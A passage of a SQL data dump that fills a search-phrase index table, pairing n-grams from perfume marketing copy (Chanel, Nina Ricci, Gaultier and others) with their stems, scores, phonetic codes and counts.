mimics',0,1,1.5333,'B34352',1,'en'),(20965,'bottle wear','bottl wear',0,1,1.3667,'B346',1,'en'),(20966,'bottle wear this','bottl wear this',0,1,1.5333,'B34632',1,'en'),(20967,'bourbon','bourbon',0,0,0.4667,'B615',1,'en'),(20968,'bourbon vanilla','bourbon vanilla',0,1,1.5,'B615154',1,'en'),(20969,'bourbon vanilla flavouring','bourbon vanilla flavouring',0,1,1.8667,'B615154141652',1,'en'),(20970,'box','box',0,0,0.2,'B200',2,'en'),(20971,'box that','box that',0,1,1.2667,'B230',1,'en'),(20972,'box that represented','box that represented',0,1,1.6667,'B23616253',1,'en'),(20973,'brand','brand',0,0,0.3333,'B653',4,'en'),(20974,'brand founder','brand founder',0,1,1.4333,'B6531536',1,'en'),(20975,'brand founder and','brand founder and',0,1,1.5667,'B653153653',1,'en'),(20976,'brand many','brand many',0,1,1.3333,'B6535',1,'en'),(20977,'brand many crystal','brand many crystal',0,1,1.6,'B653526234',1,'en'),(20978,'brand re','brand re',0,1,1.2667,'B6536',1,'en'),(20979,'brand re dresses','brand re dresses',0,1,1.5333,'B6536362',1,'en'),(20980,'bright','bright',0,0,0.4,'B623',1,'en'),(20981,'bright violet','bright violet',0,1,1.4333,'B623143',1,'en'),(20982,'bright violet lotus','bright violet lotus',0,1,1.6333,'B623143432',1,'en'),(20983,'bring that','bring that',0,1,1.3333,'B6523',1,'en'),(20984,'bring that hallmark','bring that hallmark',0,1,1.6333,'B65234562',1,'en'),(20985,'brings','bring',0,0,0.4,'B652',1,'en'),(20986,'brings out','bring out',0,1,1.3333,'B6523',1,'en'),(20987,'brings out sensual','bring out sensual',0,1,1.6,'B65232524',1,'en'),(20988,'bush','bush',0,0,0.2667,'B200',1,'en'),(20989,'bush jasmine','bush jasmine',0,1,1.4,'B250',1,'en'),(20990,'bush jasmine lily','bush jasmine lily',0,1,1.5667,'B254',1,'en'),(20991,'business pages 7','busi pages 7',0,1,1.5333,'B25212',1,'en'),(20992,'by a','by a',0,1,1.1333,'B000',2,'en'),(20993,'by a lot','by a lot',0,1,1.2667,'B430',1,'en'),(20994,'by coco','by coco',0,1,1.2333,'B200',1,'en'),(20995,'by coco chanel','by coco chanel',0,1,1.4667,'B254',1,'en'),(20996,'by jewel','by jewel',0,1,1.2667,'B240',1,'en'),(20997,'by jewel colored','by jewel colored',0,1,1.5333,'B242463',1,'en'),(20998,'by many','by many',0,1,1.2333,'B500',1,'en'),(20999,'by many celebrities','by many celebrities',0,1,1.6333,'B5241632',1,'en'),(21000,'by nina','by nina',0,1,1.2333,'B500',1,'en'),(21001,'by nina ricci','by nina ricci',0,1,1.4333,'B562',1,'en'),(21002,'by the effort','by the effort',0,1,1.4333,'B3163',1,'en'),(21003,'by women','by women',0,1,1.2667,'B500',1,'en'),(21004,'by women in','by women in',0,1,1.3667,'B500',1,'en'),(21005,'carnation','carnat',0,0,0.6,'C6535',1,'en'),(21006,'carnation bergamot','carnat bergamot',0,1,1.6,'C653516253',1,'en'),(21007,'carnation bergamot rosewood','carnat bergamot rosewood',0,1,1.9,'C653516253623',1,'en'),(21008,'celebrities','celebr',0,0,0.7333,'C41632',1,'en'),(21009,'celebrities including','celebr including',0,1,1.7,'C41632524352',1,'en'),(21010,'celebrities including marilyn','celebr including marilyn',0,1,1.9667,'C416325243525645',1,'en'),(21011,'chanel','chanel',0,0,0.4,'C540',1,'en'),(21012,'chanel absolutely.5','chanel absolutely.5',0,1,1.6333,'C5412434',1,'en'),(21013,'chanel absolutely.5 is','chanel absolutely.5 is',0,1,1.7333,'C54124342',1,'en'),(21014,'chanel herself','chanel herself',0,1,1.4667,'C546241',1,'en'),(21015,'chanel herself it','chanel herself it',0,1,1.5667,'C5462413',1,'en'),(21016,'charm','charm',0,0,0.3333,'C650',2,'en'),(21017,'charm and','charm and',0,1,1.3,'C653',1,'en'),(21018,'charm and refinement','charm and refinement',0,1,1.6667,'C6536153',1,'en'),(21019,'chemist','chemist',0,0,0.4667,'C523',1,'en'),(21020,'chemist who','chemist who',0,1,1.3667,'C523',1,'en'),(21021,'chemist who created','chemist who created',0,1,1.6333,'C523263',1,'en'),(21022,'chief','chief',0,0,0.3333,'C100',3,'en'),(21023,'chief creative','chief creative',0,1,1.4667,'C12631',1,'en'),(21024,'chief creative officer','chief creative officer',0,1,1.7333,'C1263126',1,'en'),(21025,'chinese','chines',0,0,0.4667,'C520',1,'en'),(21026,'chinese orange','chines orange',0,1,1.4667,'C52652',1,'en'),(21027,'chinese orange toffee','chines orange toffee',0,1,1.7,'C5265231',1,'en'),(21028,'choo','choo',0,0,0.2667,'C000',1,'en'),(21029,'choo is','choo is',0,1,1.2333,'C000',1,'en'),(21030,'choo is a','choo is a',0,1,1.3,'C000',1,'en'),(21031,'choo jimmy','choo jimmy',0,1,1.3333,'C500',1,'en'),(21032,'choo jimmy choo','choo jimmy choo',0,1,1.5,'C520',1,'en'),(21033,'chypre','chypr',0,0,0.4,'C160',1,'en'),(21034,'chypre notes','chypr notes',0,1,1.4,'C16532',1,'en'),(21035,'chypre notes the','chypr notes the',0,1,1.5333,'C165323',1,'en'),(21036,'cinnamon','cinnamon',0,0,0.5333,'C500',1,'en'),(21037,'cinnamon linden','cinnamon linden',0,1,1.5,'C54535',1,'en'),(21038,'cinnamon linden oil','cinnamon linden oil',0,1,1.6333,'C545354',1,'en'),(21039,'classic','classic',0,0,0.4667,'C420',3,'en'),(21040,'classic perfume','classic perfume',0,1,1.5,'C421615',1,'en'),(21041,'classic perfume here','classic perfume here',0,1,1.6667,'C4216156',1,'en'),(21042,'classic scent','classic scent',0,1,1.4333,'C4253',1,'en'),(21043,'classic scent has','classic scent has',0,1,1.5667,'C42532',1,'en'),(21044,'classique','classiqu',0,0,0.6,'C420',1,'en'),(21045,'classique this','classiqu this',0,1,1.4667,'C4232',1,'en'),(21046,'classique this perfume','classiqu this perfume',0,1,1.7333,'C42321615',1,'en'),(21047,'cloves','clove',0,0,0.4,'C412',1,'en'),(21048,'cloves jasmine','clove jasmine',0,1,1.4667,'C4125',1,'en'),(21049,'cloves jasmine orris','clove jasmine orris',0,1,1.6667,'C412562',1,'en'),(21050,'coco','coco',0,0,0.2667,'C000',1,'en'),(21051,'coco chanel','coco chanel',0,1,1.3667,'C540',1,'en'),(21052,'coco chanel herself','coco chanel herself',0,1,1.6333,'C546241',1,'en'),(21053,'code','code',0,0,0.2667,'C300',2,'en'),(21054,'code fill','code fill',0,1,1.3,'C314',1,'en'),(21055,'code fill femme','code fill femme',0,1,1.5,'C31415',1,'en'),(21056,'code pour','code pour',0,1,1.3,'C316',1,'en'),(21057,'code pour femme','code pour femme',0,1,1.5,'C31615',1,'en'),(21058,'colored','color',0,0,0.4667,'C463',2,'en'),(21059,'colored venetian','color venetian',0,1,1.5333,'C4631535',1,'en'),(21060,'colored venetian murano','color venetian murano',0,1,1.7667,'C463153565',1,'en'),(21061,'complex','complex',0,0,0.4667,'C5142',1,'en'),(21062,'complex and','complex and',0,1,1.3667,'C514253',1,'en'),(21063,'complex and vanilla','complex and vanilla',0,1,1.6333,'C514253154',1,'en'),(21064,'compliments','compliment',0,0,0.7333,'C514532',1,'en'),(21065,'compliments from','compliment from',0,1,1.5333,'C514532165',1,'en'),(21066,'compliments from women','compliment from women',0,1,1.7333,'C514532165',1,'en'),(21067,'conditions','condit',0,0,0.6667,'C5352',1,'en'),(21068,'conditions by','condit by',0,1,1.4333,'C53521',1,'en'),(21069,'conditions by nina','condit by nina',0,1,1.6,'C535215',1,'en'),(21070,'confident','confid',0,0,0.6,'C51353',1,'en'),(21071,'confident and','confid and',0,1,1.4333,'C5135353',1,'en'),(21072,'confident and sexy','confid and sexy',0,1,1.6,'C51353532',1,'en'),(21073,'confident when','confid when',0,1,1.4667,'C513535',1,'en'),(21074,'confident when wearing','confid when wearing',0,1,1.7333,'C513535652',1,'en'),(21075,'consequently','consequ',0,0,0.8,'C52534',1,'en'),(21076,'consequently musk','consequ musk',0,1,1.5667,'C5253452',1,'en'),(21077,'consequently musk this','consequ musk this',0,1,1.7333,'C525345232',1,'en'),(21078,'contains','contain',0,0,0.5333,'C5352',1,'en'),(21079,'contains tiger','contain tiger',0,1,1.4667,'C5352326',1,'en'),(21080,'contains tiger orchard','contain tiger orchard',0,1,1.7333,'C5352326263',1,'en'),(21081,'created a','creat a',0,1,1.3,'C630',1,'en'),(21082,'created a bottle','creat a bottle',0,1,1.5333,'C63134',1,'en'),(21083,'created by','creat by',0,1,1.3333,'C631',1,'en'),(21084,'created by the','creat by the',0,1,1.4667,'C6313',1,'en'),(21085,'created this','creat this',0,1,1.4,'C632',1,'en'),(21086,'created this excellent','creat this excellent',0,1,1.7333,'C632453',1,'en'),(21087,'creative','creativ',0,0,0.5333,'C631',1,'en'),(21088,'creative officer','creativ officer',0,1,1.5333,'C63126',1,'en'),(21089,'creative officer tamara','creativ officer tamara',0,1,1.7667,'C63126356',1,'en'),(21090,'crystal','crystal',0,0,0.4667,'C6234',1,'en'),(21091,'crystal encrusted','crystal encrusted',0,1,1.5667,'C623452623',1,'en'),(21092,'crystal encrusted shoes','crystal encrusted shoes',0,1,1.7667,'C6234526232',1,'en'),(21093,'daffodil','daffodil',0,0,0.5333,'D134',1,'en'),(21094,'daffodil bourbon','daffodil bourbon',0,1,1.5333,'D1341615',1,'en'),(21095,'daffodil bourbon vanilla','daffodil bourbon vanilla',0,1,1.8,'D1341615154',1,'en'),(21096,'daisy','daisi',0,0,0.3333,'D200',1,'en'),(21097,'daisy is','daisi is',0,1,1.2667,'D200',1,'en'),(21098,'daisy is polo','daisi is polo',0,1,1.4333,'D214',1,'en'),(21099,'dark','dark',0,0,0.2667,'D620',1,'en'),(21100,'dark red','dark red',0,1,1.2667,'D6263',1,'en'),(21101,'dark red red','dark red red',0,1,1.4,'D626363',1,'en'),(21102,'day armani','dai armani',0,1,1.3333,'D650',1,'en'),(21103,'day armani code','dai armani code',0,1,1.5,'D6523',1,'en'),(21104,'day lily','dai lily',0,1,1.2667,'D400',1,'en'),(21105,'day lily patchouli','dai lily patchouli',0,1,1.6,'D41324',1,'en'),(21106,'deals','deal',0,0,0.3333,'D420',2,'en'),(21107,'deals it','deal it',0,1,1.2667,'D423',1,'en'),(21108,'deals it and','deal it and',0,1,1.4,'D42353',1,'en'),(21109,'design was','design was',0,1,1.3333,'D252',1,'en'),(21110,'design was inspired','design was inspired',0,1,1.6333,'D25252163',1,'en'),(21111,'designer and','design and',0,1,1.4,'D25653',1,'en'),(21112,'designer and he','design and he',0,1,1.5,'D25653',1,'en'),(21113,'designer benzoin','design benzoin',0,1,1.5333,'D2561525',1,'en'),(21114,'designer benzoin forest','design benzoin forest',0,1,1.7667,'D25615251623',1,'en'),(21115,'doesn\'t.5','doesn',0,0,0.6,'D253',1,'en'),(21116,'doesn\'t.5 chanel','doesn chanel',0,1,1.5333,'D253254',1,'en'),(21117,'doesn\'t.5 chanel absolutely.5','doesn chanel absolutely.5',0,1,1.9667,'D25325412434',1,'en'),(21118,'dresses','dress',0,0,0.4667,'D620',5,'en'),(21119,'dresses the','dress the',0,1,1.3667,'D623',1,'en'),(21120,'dresses the torso','dress the torso',0,1,1.5667,'D62362',1,'en'),(21121,'du','du',0,0,0.1333,'D000',2,'en'),(21122,'du conditions','du conditions',0,1,1.4333,'D25352',1,'en'),(21123,'du conditions by','du conditions by',0,1,1.5333,'D253521',1,'en'),(21124,'du temps','du temps',0,1,1.2667,'D512',1,'en'),(21125,'du temps is','du temps is',0,1,1.3667,'D512',1,'en'),(21126,'effort','effort',0,0,0.4,'E163',3,'en'),(21127,'effort of','effort of',0,1,1.3,'E1631',1,'en'),(21128,'effort of ralph','effort of ralph',0,1,1.5,'E1631641',1,'en'),(21129,'elegance','eleg',0,0,0.5333,'E4252',2,'en'),(21130,'elegance l','eleg l',0,1,1.3333,'E42524',1,'en'),(21131,'elegance l du','eleg l du',0,1,1.4333,'E425243',1,'en'),(21132,'elegant','eleg',0,0,0.4667,'E4253',1,'en'),(21133,'elegant and','eleg and',0,1,1.3667,'E425353',1,'en'),(21134,'elegant and classic','eleg and classic',0,1,1.6333,'E425353242',1,'en'),(21135,'emerald','emerald',0,0,0.4667,'E5643',1,'en'),(21136,'emerald as','emerald as',0,1,1.3333,'E56432',1,'en'),(21137,'emerald as for','emerald as for',0,1,1.4667,'E5643216',1,'en'),(21138,'enchantment','enchant',0,0,0.7333,'E525353',1,'en'),(21139,'enchantment perfume','enchant perfume',0,1,1.6333,'E5253531615',1,'en'),(21140,'enchantment perfume is','enchant perfume is',0,1,1.7333,'E52535316152',1,'en'),(21141,'encrusted','encrust',0,0,0.6,'E52623',1,'en'),(21142,'encrusted shoes','encrust shoes',0,1,1.5,'E526232',1,'en'),(21143,'encrusted shoes this','encrust shoes this',0,1,1.6667,'E52623232',1,'en'),(21144,'endurance','endur',0,0,0.6,'E53652',1,'en'),(21145,'endurance many','endur many',0,1,1.4667,'E536525',1,'en'),(21146,'endurance many for','endur many for',0,1,1.6,'E53652516',1,'en'),(21147,'ernest','ernest',0,0,0.4,'E6523',1,'en'),(21148,'ernest beaux','ernest beaux',0,1,1.4,'E652312',1,'en'),(21149,'ernest beaux was','ernest beaux was',0,1,1.5333,'E652312',1,'en'),(21150,'essence','essenc',0,0,0.4667,'E252',1,'en'),(21151,'essence rose','essenc rose',0,1,1.4,'E25262',1,'en'),(21152,'essence rose fact','essenc rose fact',0,1,1.5667,'E25262123',1,'en'),(21153,'ever','ever',0,0,0.2667,'E160',2,'en'),(21154,'ever perfume','ever perfume',0,1,1.4,'E161615',1,'en'),(21155,'ever perfume launched','ever perfume launched',0,1,1.7,'E1616154523',1,'en'),(21156,'every location','everi location',0,1,1.4667,'E164235',1,'en'),(21157,'every location 1.chanel','everi location 1.chanel',0,1,1.7667,'E164235254',1,'en'),(21158,'excellent','excel',0,0,0.6,'E2453',1,'en'),(21159,'excellent perfume','excel perfume',0,1,1.5667,'E24531615',1,'en'),(21160,'excellent perfume that','excel perfume that',0,1,1.7333,'E245316153',1,'en'),(21161,'eye','ey',0,0,0.2,'E000',2,'en'),(21162,'eye designer','ey designer',0,1,1.4,'E3256',1,'en'),(21163,'eye designer benzoin','ey designer benzoin',0,1,1.6667,'E32561525',1,'en'),(21164,'fabron','fabron',0,0,0.4,'F650',1,'en'),(21165,'fabron the','fabron the',0,1,1.3333,'F653',1,'en'),(21166,'fabron the scent','fabron the scent',0,1,1.5333,'F653253',1,'en'),(21167,'fact vanilla','fact vanilla',0,1,1.4,'F23154',1,'en'),(21168,'fact vanilla flavor','fact vanilla flavor',0,1,1.6333,'F231541416',1,'en'),(21169,'famous','famou',0,0,0.4,'F520',2,'en'),(21170,'famous perfume','famou perfume',0,1,1.4667,'F521615',1,'en'),(21171,'famous perfume and','famou perfume and',0,1,1.6,'F5216153',1,'en'),(21172,'famous perfume in','famou perfume in',0,1,1.5667,'F521615',1,'en'),(21173,'fantastic','fantast',0,0,0.6,'F53232',1,'en'),(21174,'fantastic finish','fantast finish',0,1,1.5333,'F53232152',1,'en'),(21175,'fantastic finish off','fantast finish off',0,1,1.6667,'F532321521',1,'en'),(21176,'favorite','favorit',0,0,0.5333,'F630',2,'en'),(21177,'favorite to','favorit to',0,1,1.3667,'F630',1,'en'),(21178,'favorite to many','favorit to many',0,1,1.5333,'F635',1,'en'),(21179,'featuring','featur',0,0,0.6,'F3652',1,'en'),(21180,'featuring its','featur its',0,1,1.4333,'F365232',1,'en'),(21181,'featuring its flower','featur its flower',0,1,1.6667,'F365232146',1,'en'),(21182,'feel when','feel when',0,1,1.3,'F450',1,'en'),(21183,'feel when worn','feel when worn',0,1,1.4667,'F4565',1,'en'),(21184,'feminine','feminin',0,0,0.5333,'F500',2,'en'),(21185,'feminine scent','feminin scent',0,1,1.4667,'F5253',1,'en'),(21186,'feminine scent lasts','feminin scent lasts',0,1,1.6667,'F52534232',1,'en'),(21187,'feminine scent.8.jimmy','feminin scent.8.jimmy',0,1,1.7333,'F525325',1,'en'),(21188,'feminine scent.8.jimmy choo','feminin scent.8.jimmy choo',0,1,1.9,'F5253252',1,'en'),(21189,'feminine shape','feminin shape',0,1,1.4667,'F521',1,'en'),(21190,'feminine shape 6.ralph','feminin shape 6.ralph',0,1,1.7333,'F521641',1,'en'),(21191,'femme','femm',0,0,0.3333,'F500',1,'en'),(21192,'femme has','femm has',0,1,1.3,'F520',1,'en'),(21193,'femme has sees','femm has sees',0,1,1.4667,'F520',1,'en'),(21194,'femme this','femm this',0,1,1.3333,'F532',1,'en'),(21195,'femme this sexy','femm this sexy',0,1,1.5,'F532',1,'en'),(21196,'figure','figur',0,0,0.4,'F260',3,'en'),(21197,'figure year','figur year',0,1,1.3667,'F260',1,'en'),(21198,'figure year in','figur year in',0,1,1.4667,'F265',1,'en'),(21199,'fill','fill',0,0,0.2667,'F400',2,'en'),(21200,'fill femme','fill femme',0,1,1.3333,'F415',1,'en'),(21201,'fill femme this','fill femme this',0,1,1.5,'F41532',1,'en'),(21202,'finish','finish',0,0,0.4,'F520',1,'en'),(21203,'finish off','finish off',0,1,1.3333,'F521',1,'en'),(21204,'finish off a','finish off a',0,1,1.4,'F521',1,'en'),(21205,'first ever','first ever',0,1,1.3333,'F62316',1,'en'),(21206,'first ever perfume','first ever perfume',0,1,1.6,'F623161615',1,'en'),(21207,'first parfum','first parfum',0,1,1.4,'F6231615',1,'en'),(21208,'first parfum launched','first parfum launched',0,1,1.7,'F62316154523',1,'en'),(21209,'flavor','flavor',0,0,0.4,'F416',1,'en'),(21210,'flavor orchid','flavor orchid',0,1,1.4333,'F41623',1,'en'),(21211,'flavor orchid daffodil','flavor orchid daffodil',0,1,1.7333,'F41623134',1,'en'),(21212,'flavouring','flavour',0,0,0.6667,'F41652',1,'en'),(21213,'flavouring and','flavour and',0,1,1.4667,'F4165253',1,'en'),(21214,'flavouring and white','flavour and white',0,1,1.6667,'F4165253',1,'en'),(21215,'flavouring attractive','flavour attractive',0,1,1.7,'F4165236231',1,'en'),(21216,'flavouring attractive and','flavour attractive and',0,1,1.8333,'F416523623153',1,'en'),(21217,'flavouring pleasant','flavour pleasant',0,1,1.6333,'F4165214253',1,'en'),(21218,'flavouring pleasant amber','flavour pleasant amber',0,1,1.8333,'F4165214253516',1,'en'),(21219,'floral','floral',0,0,0.4,'F464',1,'en'),(21220,'floral and','floral and',0,1,1.3333,'F46453',1,'en'),(21221,'floral and spicy','floral and spicy',0,1,1.5333,'F46453212',1,'en'),(21222,'floral oriental','floral oriental',0,1,1.5,'F4646534',1,'en'),(21223,'floral oriental scent','floral oriental scent',0,1,1.7,'F4646534253',1,'en'),(21224,'floral seringa','floral seringa',0,1,1.4667,'F4642652',1,'en'),(21225,'floral seringa bloom','floral seringa bloom',0,1,1.6667,'F4642652145',1,'en'),(21226,'flower','flower',0,0,0.4,'F460',2,'en'),(21227,'flower petals','flower petals',0,1,1.4333,'F461342',1,'en'),(21228,'flower petals and','flower petals and',0,1,1.5667,'F46134253',1,'en'),(21229,'flower top','flower top',0,1,1.3333,'F4631',1,'en'),(21230,'flower top and','flower top and',0,1,1.4667,'F463153',1,'en'),(21231,'for any special','for any special',0,1,1.5,'F652124',1,'en'),(21232,'for men','for men',0,1,1.2333,'F650',4,'en'),(21233,'for men to','for men to',0,1,1.3333,'F653',2,'en'),(21234,'for the structure','for the structure',0,1,1.5667,'F63236236',1,'en'),(21235,'for this','for this',0,1,1.2667,'F632',3,'en'),(21236,'for this perfume','for this perfume',0,1,1.5333,'F6321615',1,'en'),(21237,'for women','for women',0,1,1.3,'F650',3,'en'),(21238,'for women who','for women who',0,1,1.4333,'F650',1,'en'),(21239,'forest','forest',0,0,0.4,'F623',1,'en'),(21240,'forest vetiver','forest vetiver',0,1,1.4667,'F6231316',1,'en'),(21241,'forest vetiver in','forest vetiver in',0,1,1.5667,'F62313165',1,'en'),(21242,'founder','founder',0,0,0.4667,'F536',2,'en'),(21243,'founder and','founder and',0,1,1.3667,'F53653',1,'en'),(21244,'founder and chief','founder and chief',0,1,1.5667,'F5365321',1,'en'),(21245,'france','franc',0,0,0.4,'F652',1,'en'),(21246,'france in','franc in',0,1,1.3,'F6525',1,'en'),(21247,'france in 1948.it','franc in 1948.it',0,1,1.5667,'F65253',1,'en'),(21248,'francis','franci',0,0,0.4667,'F652',2,'en'),(21249,'francis fabron','franci fabron',0,1,1.4667,'F652165',1,'en'),(21250,'francis fabron the','franci fabron the',0,1,1.6,'F6521653',1,'en'),(21251,'freesia','freesia',0,0,0.4667,'F620',1,'en'),(21252,'freesia bright','freesia bright',0,1,1.4667,'F621623',1,'en'),(21253,'freesia bright violet','freesia bright violet',0,1,1.7,'F621623143',1,'en'),(21254,'fresh','fresh',0,0,0.3333,'F620',3,'en'),(21255,'fresh and','fresh and',0,1,1.3,'F6253',1,'en'),(21256,'fresh and feminine','fresh and feminine',0,1,1.6,'F625315',1,'en'),(21257,'fresh and timeless','fresh and timeless',0,1,1.6,'F6253542',1,'en'),(21258,'fresh scent','fresh scent',0,1,1.3667,'F6253',1,'en'),(21259,'fresh scent has','fresh scent has',0,1,1.5,'F62532',1,'en'),(21260,'from the nina','from the nina',0,1,1.4333,'F6535',1,'en'),(21261,'from the wearer.10.jean','from the wearer.10.jean',0,1,1.7667,'F653625',1,'en'),(21262,'from women','from women',0,1,1.3333,'F650',1,'en'),(21263,'from women and','from women and',0,1,1.4667,'F653',1,'en'),(21264,'gardenia','gardenia',0,0,0.5333,'G635',1,'en'),(21265,'gardenia orchid','gardenia orchid',0,1,1.5,'G635623',1,'en'),(21266,'gardenia orchid cloves','gardenia orchid cloves',0,1,1.7333,'G6356232412',1,'en'),(21267,'gardenia violet','gardenia violet',0,1,1.5,'G635143',1,'en'),(21268,'gardenia violet flower','gardenia violet flower',0,1,1.7333,'G635143146',1,'en'),(21269,'gaultier','gaultier',0,0,0.5333,'G436',1,'en'),(21270,'gaultier classique','gaultier classique',0,1,1.6,'G436242',1,'en'),(21271,'gaultier classique this','gaultier classique this',0,1,1.7667,'G43624232',1,'en'),(21272,'gaultier first','gaultier first',0,1,1.4667,'G4361623',1,'en'),(21273,'gaultier first parfum','gaultier first parfum',0,1,1.7,'G43616231615',1,'en'),(21274,'gaultier is','gaultier is',0,1,1.3667,'G4362',1,'en'),(21275,'gaultier is not','gaultier is not',0,1,1.5,'G436253',1,'en'),(21276,'genuine','genuin',0,0,0.4667,'G500',2,'en'),(21277,'genuine tonka','genuin tonka',0,1,1.4333,'G5352',1,'en'),(21278,'genuine tonka bean','genuin tonka bean',0,1,1.6,'G535215',1,'en'),(21279,'get many','get many',0,1,1.2667,'G350',1,'en'),(21280,'get many compliments','get many compliments',0,1,1.6667,'G352514532',1,'en'),(21281,'get their','get their',0,1,1.3,'G360',1,'en'),(21282,'get their spouse','get their spouse',0,1,1.5333,'G36212',1,'en'),(21283,'gift','gift',0,0,0.2667,'G130',3,'en'),(21284,'gift for','gift for',0,1,1.2667,'G1316',1,'en'),(21285,'gift for men','gift for men',0,1,1.4,'G13165',1,'en'),(21286,'ginger','ginger',0,0,0.4,'G526',1,'en'),(21287,'ginger herb','ginger herb',0,1,1.3667,'G5261',1,'en'),(21288,'ginger herb pear','ginger herb pear',0,1,1.5333,'G52616',1,'en'),(21289,'girly','girli',0,0,0.3333,'G640',1,'en'),(21290,'girly figure','girli figure',0,1,1.4,'G64126',1,'en'),(21291,'girly figure year','girli figure year',0,1,1.5667,'G64126',1,'en'),(21292,'glass','glass',0,0,0.3333,'G420',2,'en'),(21293,'glass and','glass and',0,1,1.3,'G4253',1,'en'),(21294,'glass and suits','glass and suits',0,1,1.5,'G4253232',1,'en'),(21295,'grapefruit','grapefruit',0,0,0.6667,'G6163',1,'en'),(21296,'grapefruit gardenia','grapefruit gardenia',0,1,1.6333,'G61632635',1,'en'),(21297,'grapefruit gardenia violet','grapefruit gardenia violet',0,1,1.8667,'G61632635143',1,'en'),(21298,'great pick','great pick',0,1,1.3333,'G6312',1,'en'),(21299,'great pick me','great pick me',0,1,1.4333,'G63125',1,'en'),(21300,'hallmark','hallmark',0,0,0.5333,'H4562',1,'en'),(21301,'hallmark of','hallmark of',0,1,1.3667,'H45621',1,'en'),(21302,'hallmark of himself','hallmark of himself',0,1,1.6333,'H456215241',1,'en'),(21303,'has aldehydes','ha aldehydes',0,1,1.4333,'H2432',1,'en'),(21304,'has aldehydes lime','ha aldehydes lime',0,1,1.6,'H243245',1,'en'),(21305,'has amazing','ha amazing',0,1,1.3667,'H25252',1,'en'),(21306,'has amazing endurance','ha amazing endurance',0,1,1.7,'H2525253652',1,'en'),(21307,'has an','ha an',0,1,1.2,'H250',1,'en'),(21308,'has an strengthening','ha an strengthening',0,1,1.6667,'H2523652352',1,'en'),(21309,'has been','ha been',0,1,1.2667,'H215',6,'en'),(21310,'has been a','ha been a',0,1,1.3333,'H215',2,'en'),(21311,'has been worn','ha been worn',0,1,1.4333,'H21565',1,'en'),(21312,'has notes','ha notes',0,1,1.3,'H2532',1,'en'),(21313,'has notes of','ha notes of',0,1,1.4,'H25321',1,'en'),(21314,'has sees','ha sees',0,1,1.2667,'H200',1,'en'),(21315,'has sees of','ha sees of',0,1,1.3667,'H210',1,'en'),(21316,'he was able','he was able',0,1,1.3667,'H214',1,'en'),(21317,'her preferences','her preferences',0,1,1.5,'H6161652',1,'en'),(21318,'her preferences the','her preferences the',0,1,1.6333,'H61616523',1,'en'),(21319,'herb','herb',0,0,0.2667,'H610',1,'en'),(21320,'herb pear','herb pear',0,1,1.3,'H616',1,'en'),(21321,'herb pear sorbet','herb pear sorbet',0,1,1.5333,'H6162613',1,'en'),(21322,'here first','here first',0,1,1.3333,'H61623',1,'en'),(21323,'here first ever','here first ever',0,1,1.5,'H6162316',1,'en'),(21324,'here is','here is',0,1,1.2333,'H620',1,'en'),(21325,'here is a','here is a',0,1,1.3,'H620',1,'en'),(21326,'herself','herself',0,0,0.4667,'H6241',1,'en'),(21327,'herself it','herself it',0,1,1.3333,'H62413',1,'en'),(21328,'herself it is','herself it is',0,1,1.4333,'H624132',1,'en'),(21329,'himself','himself',0,0,0.4667,'H5241',2,'en'),(21330,'himself into','himself into',0,1,1.4,'H524153',1,'en'),(21331,'himself into this','himself into this',0,1,1.5667,'H5241532',1,'en'),(21332,'homepage','homepag',0,0,0.5333,'H512',1,'en'),(21333,'homepage a','homepag a',0,1,1.3333,'H512',1,'en'),(21334,'homepage a youthful','homepag a youthful',0,1,1.6333,'H512314',1,'en'),(21335,'honey','honei',0,0,0.3333,'H500',1,'en'),(21336,'honey valuable','honei valuable',0,1,1.4667,'H51414',1,'en'),(21337,'honey valuable woods','honei valuable woods',0,1,1.6667,'H5141432',1,'en'),(21338,'house','hous',0,0,0.3333,'H200',2,'en'),(21339,'house acquiring','hous acquiring',0,1,1.5,'H2652',1,'en'),(21340,'house acquiring passion','hous acquiring passion',0,1,1.7667,'H2652125',1,'en'),(21341,'how this','how this',0,1,1.2667,'H320',1,'en'),(21342,'how this fresh','how this fresh',0,1,1.4667,'H32162',1,'en'),(21343,'iconic','icon',0,0,0.4,'I252',2,'en'),(21344,'iconic perfume','icon perfume',0,1,1.4667,'I2521615',1,'en'),(21345,'iconic perfume from','icon perfume from',0,1,1.6333,'I2521615165',1,'en'),(21346,'in 1948.it','in 1948.it',0,1,1.3333,'I530',1,'en'),(21347,'in 1948.it is','in 1948.it is',0,1,1.4333,'I532',1,'en'),(21348,'in 1993.it','in 1993.it',0,1,1.3333,'I530',1,'en'),(21349,'in 1993.it is','in 1993.it is',0,1,1.4333,'I532',1,'en'),(21350,'in a bottle','in a bottle',0,1,1.3667,'I5134',1,'en'),(21351,'in addition','in addition',0,1,1.3667,'I535',3,'en'),(21352,'in addition sasalwood','in addition sasalwood',0,1,1.7,'I535243',1,'en'),(21353,'in every','in every',0,1,1.2667,'I516',4,'en'),(21354,'in every location','in every location',0,1,1.5667,'I5164235',1,'en'),(21355,'in france','in france',0,1,1.3,'I51652',1,'en'),(21356,'in france in','in france in',0,1,1.4,'I516525',1,'en'),(21357,'in the world','in the world',0,1,1.4,'I53643',3,'en'),(21358,'in year','in year',0,1,1.2333,'I560',1,'en'),(21359,'in year out','in year out',0,1,1.3667,'I563',1,'en'),(21360,'including','includ',0,0,0.6,'I524352',3,'en'),(21361,'including marilyn','includ marilyn',0,1,1.5667,'I5243525645',1,'en'),(21362,'including marilyn monroe','includ marilyn monroe',0,1,1.8,'I52435256456',1,'en'),(21363,'indonesian','indonesian',0,0,0.6667,'I53525',1,'en'),(21364,'indonesian patchouli','indonesian patchouli',0,1,1.6667,'I535251324',1,'en'),(21365,'indonesian patchouli and','indonesian patchouli and',0,1,1.8,'I53525132453',1,'en'),(21366,'inspired','inspir',0,0,0.5333,'I52163',2,'en'),(21367,'inspired by','inspir by',0,1,1.3667,'I521631',1,'en'),(21368,'inspired by jewel','inspir by jewel',0,1,1.5667,'I52163124',1,'en'),(21369,'into this','into this',0,1,1.3,'I532',1,'en'),(21370,'into this perfume','into this perfume',0,1,1.5667,'I5321615',1,'en'),(21371,'irresisteble','irresistebl',0,0,0.8,'I62314',1,'en'),(21372,'irresisteble feel','irresistebl feel',0,1,1.5667,'I6231414',1,'en'),(21373,'irresisteble feel when','irresistebl feel when',0,1,1.7333,'I62314145',1,'en'),(21374,'is a list','is a list',0,1,1.3,'I2423',1,'en'),(21375,'is a love','is a love',0,1,1.3,'I241',1,'en'),(21376,'is a perfume','is a perfume',0,1,1.4,'I21615',1,'en'),(21377,'is a preferred','is a preferred',0,1,1.4667,'I216163',1,'en'),(21378,'is a woman','is a woman',0,1,1.3333,'I250',1,'en'),(21379,'is a wonderful','is a 